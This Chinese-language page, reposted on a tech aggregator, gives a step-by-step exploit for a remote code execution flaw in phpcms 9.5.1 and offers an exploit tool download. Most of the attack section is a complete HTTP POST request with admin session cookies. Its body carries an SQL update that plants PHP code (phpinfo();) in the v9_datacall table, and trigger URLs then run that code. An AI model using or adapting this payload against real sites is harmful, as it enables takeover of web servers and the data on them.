phpcms 9.5.1 index.php 远程代码执行漏洞(利用工具)

编程入门 行业动态 更新时间:2024-10-07 07:28:11

phpcms 9.5.1 index.php  远程代码执行<a href=https://www.elefans.com/category/jswz/34/1770270.html style=漏洞(利用工具)"/>

phpcms 9.5.1 index.php 远程代码执行漏洞(利用工具)

 

下载地址1

更多工具在: /

漏洞利用前提: 有phpcms后台权限

:2217/phpcms_GBK_9.5.1/index.php?m=admin&c=index
提交以上连接进入后台,点击“模块”

添加数据源
POST /phpcms_GBK_9.5.1/index.php?m=dbsource&c=data&a=add HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: :2217/phpcms_GBK_9.5.1/index.php?m=dbsource&c=data&a=add&pc_hash=h6Po4O&type=1
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)
Host: phpcms.isafe:2217
Content-Length: 316
Connection: Keep-Alive
Cookie: ZGdwR_admin_username=e17cVgcDAAVUAQMEVAEJAgACAF9UVwJRWQFQClZIDkgFCxU; ZGdwR_siteid=9de4BANRAgYICVYBVgVXWFBfC1QHBloHBA0IBgMG; ZGdwR_userid=798fCQdTAwQABlEHBwhQAFRbBgpQVwlQAlcCVVdU; ZGdwR_admin_email=798fCQdTAwQABlEHB1wFAFZSBloCUlQHVlMLXAcEUAsKXCVQRAJVUR5VAg; ZGdwR_sys_lang=07eaAQVTUQMFCAkHVlVXBV5VVAUMAgtWUgMNVQFIDUxQWg; PHPSESSID=hqgaqdbvncrsqbr3hr6b6uq8g0

type=1&data=update+v9_datacall+set+module%3D%27announce%27%2Caction%3D%27pc_tag%27%2Cdata%3D%27phpinfo%28%29%3B%27%2Ctype%3D%272%27+where+name%3D123%3B&name=123456&dis_type=1&template=%7Bloop+%24data+%24k+%24v%7D%0D%0A++++%3C%21--+%C4%E3%B5%C4%B4%FA%C2%EB+--%3E%0D%0A%7B%2Floop%7D&cache=&num=&dosubmit=&pc_hash=h6Po4O
数据源列表
:2217/phpcms_GBK_9.5.1/index.php?m=dbsource&c=data&a=init&menuid=902&pc_hash=h6Po4O

http://127.0.0.1:2217/phpcms_GBK_9.5.1/index.php?m=dbsource&c=call&a=get&id=10

提交以上链接2次,执行就phpinfo() 函数了。
http://127.0.0.1:2217/phpcms_GBK_9.5.1/index.php?m=dbsource&c=call&a=get&id=38

转载于:.html

更多推荐

phpcms 9.5.1 index.php 远程代码执行漏洞(利用工具)

本文发布于:2024-02-28 01:13:59,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1767578.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:漏洞   代码   工具   phpcms   php

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!